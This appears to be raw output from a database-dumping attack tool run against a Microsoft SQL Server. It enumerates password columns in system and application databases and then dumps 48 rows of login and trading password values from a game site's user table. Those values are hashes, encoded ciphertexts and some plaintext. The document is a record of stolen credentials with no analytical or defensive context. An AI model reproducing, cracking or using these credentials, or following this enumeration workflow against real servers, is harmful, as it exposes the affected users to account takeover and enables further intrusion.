Database: ReportServer
Table: DataSource
[1 column]
+----------+-------+
| Column | Type |
+----------+-------+
| Password | image |
+----------+-------+
Database: master
Table: sysoledbusers
[1 column]
+-------------+----------+
| Column | Type |
+-------------+----------+
| rmtpassword | nvarchar |
+-------------+----------+
Database: master
Table: syslogins
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: master
Table: sysusers
[1 column]
+----------+-----------+
| Column | Type |
+----------+-----------+
| password | varbinary |
+----------+-----------+
Database: master
Table: sql_logins
[1 column]
+---------------+-----------+
| Column | Type |
+---------------+-----------+
| password_hash | varbinary |
+---------------+-----------+
Database: News
Table: TT_User_bak
[1 column]
+-----------+----------+
| Column | Type |
+-----------+----------+
| upassword | nvarchar |
+-----------+----------+
Database: News
Table: NS_Admin
[1 column]
+----------+------+
| Column | Type |
+----------+------+
| Password | char |
+----------+------+
Database: ReportServerTempDB
Table: TempDataSources
[0 entries]
+----------+
| Password |
+----------+
+----------+
Database: SHEX_Game
Table: sst_admin
[0 entries]
+---------+
| logpass |
+---------+
+---------+
Database: SHEX_Game
Table: sst_UserInfo
[48 entries]
+-------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| LoginPassword | TradingPassword |
+-------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 114A0C68F50304A6 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | WIqYDnFIK8BMSgDr8bImwA== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 1B664C05CF64528D \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | pw5SgrQl9v7g0Js0fdMI5w== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 1CD298656E27FF1D \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | fczcyj9w1o6DezcS2inZIA== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 1D3983FFC29D30E3 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | gdRCynfp36Ve3MsFxTwU4Q== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 1EE131D2AD0077E6 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | kHLrhzE4OOE= \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 3667CE9C77E6A3B3 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | Ypv4aKuGk7CiIASTHMBgMw== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 3B069627AA9990D8 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | k5ubbA9sPkY= \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 3BD5A4D5ED8E1717 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | Yh4+c7F4WLpK7uG7aEpIaA== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 40D15B4F30F2DEA9 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | dixzhZwIQxo= \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 45E03226EEEC75B6 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | 123 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 57F2F3BA35F205BA \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | QIhoJYWyA74iS+j+Cyhsyg== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 6952096F272C7177 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | f+sLbH2vW0gNB4AM574j1Q== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 6952096F272C7177 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | f+sLbH2vW0gNB4AM574j1Q== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 6952096F272C7177 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | f+sLbH2vW0gNB4AM574j1Q== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 6952096F272C7177 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | f+sLbH2vW0gNB4AM574j1Q== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 720F8A23C0207DA6 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | nCPZAHeaYEA= \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 8816CDED18D55118 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | jzThm2W8ySJbNPzD8K1PTQ== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 92CC2FBE4DED2678 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | M9uVcRlhObU= \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 93BCD29972A8B67C \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | d7d1qqLf21/IX9CtR3SbwA== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| 9BC465A9EC85D90D \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | YbEb1LkyQ80= \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| AC59075B964B0715 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | 123 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| AC5C5F079A4D2C35 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | R0rEDlsx8bc= \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| AC5C5F079A4D2C35 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | R0rEDlsx8bc= \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| AC5C5F079A4D2C35 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | R0rEDlsx8bc= \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| AC5C5F079A4D2C35 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | R0rEDlsx8bc= \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| B293F6DF21A3CE4D \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | j6VmuwsHNZY= \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| BC18E4132667E033 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | hANgxTG7MQJmNGDm6WxSRw== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| BDD76014E8D50242 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | bQM20qW/mKThvH8lJO0LZQ== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| C6872B9198027F02 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | uGTHS9lXl2Y= \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| C8FEA84E529CBB6C \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | ETdIOioZdI5WNyooujuq8w== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| D739DA0118A492DE \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | Q6E6ZMpbi0E= \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| E21218D517932108 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | 7jqoT1UZ+ek= \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
| E6798682ADE43F02 \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 | iWJxGkq9CjvIu44aC0KShQ== \xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0\xa0 |
+-------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Database: TTGame
Table: sst_admin
[0 entries]
+---------+
| logpass |
+---------+
+---------+
Database: TTGame
Table: sst_UserInfo
[419 entries]
+-------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| LoginPassword | TradingPassword |
+-------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
